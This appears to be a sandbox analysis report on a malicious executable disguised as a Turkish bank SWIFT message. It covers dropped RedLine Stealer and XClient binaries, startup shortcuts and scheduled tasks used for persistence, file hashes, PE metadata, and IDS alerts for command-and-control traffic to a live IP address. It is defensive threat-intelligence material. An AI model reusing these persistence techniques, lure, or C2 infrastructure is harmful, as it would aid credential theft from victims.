C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqhnidw5.czt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kdjhf1eu.bc0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qn2ktekr.bav.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rc4rsfik.4in.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rsaxav0f.rsi.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\build.exe

Download File

Process:	C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	307712
Entropy (8bit):	5.081333085654021
Encrypted:	false
SSDEEP:	3072:GcZqf7D34xp/0+mAykyoORQYg/xB1fA0PuTVAtkxzw3R4eqiOL2bBOA:GcZqf7DIjnmWhB1fA0GTV8kyYL
MD5:	1ED2ECAE05AAA1C505136F5252287CC7
SHA1:	2C73C09437C4C1D5E90013A6CA7A65AC0A5FADC5
SHA-256:	D771F70BA342E5D4CD7F129A4A2B4A6C6C7293233135F266DB33F356986A70F9
SHA-512:	CA82139310EA62EC8703F6FCB19D843644A5CE40323E8F7857C9FD3173BB0796EB20F9002209B9FCBFA7CE9858FE3B932E070F8449BC2736B6712D39515D9219
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83% Antivirus: Virustotal, Detection: 75%, Browse
Joe Sandbox View:	Filename: QLTa31hZsN.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.................................@...K.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................p.......H....... ... ...........(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.

C:\Users\user\AppData\Local\Temp\tmp89AD.tmp

Download File

Process:	C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1587
Entropy (8bit):	5.112036605542636
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtSINmxvn:cgergYrFdOFzOzN33ODOiDdKrsuTSIUv
MD5:	19522400AB8D516DED3DE2E93112C0D7
SHA1:	95D59A108801264533F62430D0FB683B0B2E9EE5
SHA-256:	A1CE4AD7E3EE894859E9554FF40FECC6D6F5ACAD8D1A61D40D59E45C33C10DDB
SHA-512:	D31412240D34399ACE47DAE517C271C78920D256C94FDD2CFA4266EC2AF7F2DBB8B42114901AF163E800AE7B3B806471D6602CA989BC260333226B6DC3AEC956
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp9D06.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1587
Entropy (8bit):	5.112036605542636
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtSINmxvn:cgergYrFdOFzOzN33ODOiDdKrsuTSIUv
MD5:	19522400AB8D516DED3DE2E93112C0D7
SHA1:	95D59A108801264533F62430D0FB683B0B2E9EE5
SHA-256:	A1CE4AD7E3EE894859E9554FF40FECC6D6F5ACAD8D1A61D40D59E45C33C10DDB
SHA-512:	D31412240D34399ACE47DAE517C271C78920D256C94FDD2CFA4266EC2AF7F2DBB8B42114901AF163E800AE7B3B806471D6602CA989BC260333226B6DC3AEC956
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\ACCApi\apihost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\XClient.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	665641472
Entropy (8bit):	7.999999654634339
Encrypted:	true
SSDEEP:
MD5:	323EA75CFDE79456B79629AD4F7D8578
SHA1:	DAE8C9DBB8103764A08E9F429DB83D57883AAAB4
SHA-256:	A8105EC0319846406E06A22E940E5EAE273F4B4EAECC9840381A668E3823F521
SHA-512:	490356FDC5DDFFB617623795B88D6CDDA7C9100A45A3B78467B3A3A780F6A312FA915FE72D4C0C106864DB31A0537C072338A19A009501F37FBA6D8C6D3B4C80
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-%g............................~.... ........@.. ....................................@.................................,...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................`.......H........[...[............................................................(......(.....s.........s.........s.........s............0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0............(....(.....+......0...........(.....+....0...............(.....+....0...........(.....+....0................-.(...+.+.+...+...0...........................(.....0.. .......~.........-.(...+.....~.....+....(.....0..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\XClient.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Nov 26 07:01:16 2024, mtime=Tue Nov 26 07:01:16 2024, atime=Tue Nov 26 07:01:16 2024, length=41472, window=hide
Category:	dropped
Size (bytes):	765
Entropy (8bit):	5.042232887787167
Encrypted:	false
SSDEEP:	12:8cC24fJFy88CATrlsY//RS9ajLxxSxjAColHHkKLE0mV:8jfPp8nZwIPSFAdkK5m
MD5:	37E2F966A15A13AF9EFB35168FF60C51
SHA1:	C877D20BC4E2037A743B0C78B4180C01109EF45A
SHA-256:	1108A9C0162C80C67F647F873BFC30AAF7A9333986503297AC0627D562FA071D
SHA-512:	A28D06B4D2FE2EE008E2A2D0DA871912D530D700CA9479BEAAB784B3EB0D0229C0885F0CA666B93B658478BBBA26A24D9176BAE974CE289912A637693E8CBBC5
Malicious:	false
Preview:	L..................F.... .....f^.?....f^.?....f^.?..........................v.:..DG..Yr?.D..U..k0.&...&...... M.....V..U.?...Z.^.?......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlzY#@....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....zY%@..Roaming.@......DWSlzY%@....C.....................+~:.R.o.a.m.i.n.g.....b.2.....zY)@ .XClient.exe.H......zY)@zY)@..........................\...X.C.l.i.e.n.t...e.x.e.......Z...............-.......Y............1.N.....C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......688098...........hT..CrF.f4... .B.2=.b...,...W..hT..CrF.f4... .B.2=.b...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\XClient.exe
File Type:	MS Windows shortcut, Item id list present, Has Description string, Has Relative path, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=
Category:	dropped
Size (bytes):	926
Entropy (8bit):	3.0132957487703695
Encrypted:	false
SSDEEP:	12:8klSsXU1e/tz0/CSL4WWeMNDyWlT93gCNfBf4t2YZ/elFlSJm:8kldvWLqeMNmG93pjqy
MD5:	5DDCCDAB30A08A8D7EC70CE8259AE35E
SHA1:	0598BF10071EB7F472113EF4D52EBEBC15DFC19B
SHA-256:	4EDCFC885AE245A4584CCA52307ACB5D7BAA449CBC78395A1425945E051E6D9C
SHA-512:	7B248E6B300C13939E9B87B647B147E3EADB6A79DE6D67F06056940DF42DB05B47370DAE5450DDA67E79C9F7E83663DE53006893A402D5216A61CEC629F5B359
Malicious:	false
Preview:	L..................F........................................................5....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....T.1...........ACCApi..>............................................A.C.C.A.p.i.....b.2...........apihost.exe.H............................................a.p.i.h.o.s.t...e.x.e.........A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.............}.............>.e.L.:..er.=}...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

C:\Users\user\AppData\Roaming\XClient.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\XClient.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	665641472
Entropy (8bit):	7.999999654634339
Encrypted:	true
SSDEEP:
MD5:	323EA75CFDE79456B79629AD4F7D8578
SHA1:	DAE8C9DBB8103764A08E9F429DB83D57883AAAB4
SHA-256:	A8105EC0319846406E06A22E940E5EAE273F4B4EAECC9840381A668E3823F521
SHA-512:	490356FDC5DDFFB617623795B88D6CDDA7C9100A45A3B78467B3A3A780F6A312FA915FE72D4C0C106864DB31A0537C072338A19A009501F37FBA6D8C6D3B4C80
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-%g............................~.... ........@.. ....................................@.................................,...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................`.......H........[...[............................................................(......(.....s.........s.........s.........s............0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0............(....(.....+......0...........(.....+....0...............(.....+....0...........(.....+....0................-.(...+.+.+...+...0...........................(.....0.. .......~.........-.(...+.....~.....+....(.....0..

C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe

Download File

Process:	C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	840704
Entropy (8bit):	7.944843757101494
Encrypted:	false
SSDEEP:	24576:PBKn35eX+HnjaKB2LJKI923eTuOmvzzx428hYTGu:EpjHnj3B2VKI92uuOmrOSTGu
MD5:	7C36F1554BB662ABDDB2FAFB5DB3037D
SHA1:	4D2B146919805242A1699139D2937BAE4FDDFD4B
SHA-256:	5F93D1BA8286162E4E7EBE907745B186D2301534FD8B39A84F129F3857F16C30
SHA-512:	CAA4B4B05FDD1A5B68979ED0C2388C727DD3D89D34A2351E7E392E1DD1764A87A0AF1106E7BEAA65A287CD625088DAEB9CCFCAD4FED8CA39B273FA7142C53665
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....$...............0.............v.... ........@.. .......................@............@.................................!...O.......(.................... .........p............................................ ............... ..H............text...\|.... ...................... ..`.rsrc...(...........................@..@.reloc....... ......................@..B................U.......H...........l...........................................................0..L.........}.....(.......(......(............s......( ....o!.....("....o#.....($.....0............}........(%........(&.....,5...(............s......(.....o!.....(.....o#....85....r...p.V...('...o(...tV.......()..........9.....s.........s...s+...o,......o ...r...po-..........,$..( .....o ...r...po-...s....o.........o/...(0.......o1...(2.......o3...(4.......o5...(6.......o7...(8.......o9...(:.........

C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Documents\NOVA\Captured.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\XClient.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	664898
Entropy (8bit):	7.923486942873658
Encrypted:	false
SSDEEP:	12288:wR3YXWAGGfaxAePF7BoQLoS+7AvXP7vfIrLDRRLgimBbUcPLb4kMd3Dra:w5DAxMFUQ1+7K7IzfgimBp//
MD5:	B8938377021A4D9D9A59DE53A3E3664B
SHA1:	A8D24465CA4503DC5C426B816E79CFA6E2E434FE
SHA-256:	26C6C2C7B3B274878A049D00C3E7ABB3BBD2556CD4E24926386E259418C89027
SHA-512:	35F124D5371978E92D915339D0B2E50AE91EF42B3D22F768792813B107B6DB53735A2793050A67B1F78C4107F4C40620214766B7D2810A21CEAAFC594D875604
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.....Wy...U....}...9....=.n...m.........s...Ad...d..6H...d!.m0...3.@[9l.....g....]...V..U{K....s~.7.ZU[.=......D.,.......1y.m}>..G.=zq.\|)..%.M..s..........7!S....&.b..L.5C.s...g.0Wl...q.~fat.\|pAL........O.Q.oNL....J..\|.....?.O.7..Czt?qo;...\|..91.............b.Cw-...s.t...........y.m-..=M...Yt.s.P..-..9.}W>s.L...w.<>o.i^t...gsb...w?..t......-y.f:`..n.t.tC......M.{.q....e..1S...0...S..I.....B]..b...._.....6.^}...su.........R.W...sMZ...YL....+.,#1...s@....:..3..].:...tyZ....t.k.T.O..c.A9.Y..\|V.k.....ZO...6...W....3^~i.~.%..bE...[~.e%..../.5...a.?w.K.....>......9../..-...3.?..*...rb..q.uy...c=....ua.=6.?...8,...\|.\|n...rn....=.hc...<../...^.b...\|.....n.qz..}.<.0..y....-.a.>......R.\|...........?.../...2j.......3w;......[.....v>.0..9yMM>s...W..M...)............!....6.9.\|.\|..Ag..q..y.N9.c.G....;+Mo.?7..N.'..V...9...;[....Y.:.Qb....Y..y

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.944843757101494
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
File size:	840'704 bytes
MD5:	7c36f1554bb662abddb2fafb5db3037d
SHA1:	4d2b146919805242a1699139d2937bae4fddfd4b
SHA256:	5f93d1ba8286162e4e7ebe907745b186d2301534fd8b39a84f129f3857f16c30
SHA512:	caa4b4b05fdd1a5b68979ed0c2388c727dd3d89d34a2351e7e392e1dd1764a87a0af1106e7beaa65a287cd625088daeb9ccfcad4fed8ca39b273fa7142c53665
SSDEEP:	24576:PBKn35eX+HnjaKB2LJKI923eTuOmvzzx428hYTGu:EpjHnj3B2VKI92uuOmrOSTGu
TLSH:	AC05225037E45BA2CABA83F52D19525403F991632235E3044FDAA5FF1AA3F62CD81F1B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....$...............0.............v.... ........@.. .......................@............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4ce776
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xFA24949B [Wed Dec 27 22:22:19 2102 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xce721	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd0000	0x628	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xcbcd0	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xcc77c	0xcc800	76314509c1fa3fd3b52972ef51f446fa	False	0.955338382487775	data	7.951448525153002	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xd0000	0x628	0x800	cfcd79b9119eab668625d71386c621b7	False	0.337890625	data	3.457226636887546	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd2000	0xc	0x200	d345ee2e2f6008abaf7247ee330b3536	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xd0090	0x398	OpenPGP Public Key			0.4217391304347826
RT_MANIFEST	0xd0438	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-26T09:01:16.683212+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:16.683212+0100	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:20.082141+0100	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	212.162.149.53	36014	192.168.2.5	49707	TCP
2024-11-26T09:01:25.269085+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:26.528250+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49717	193.122.6.168	80	TCP
2024-11-26T09:01:28.230543+0100	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	212.162.149.53	36014	192.168.2.5	49707	TCP
2024-11-26T09:01:28.487260+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:29.235341+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:30.772529+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
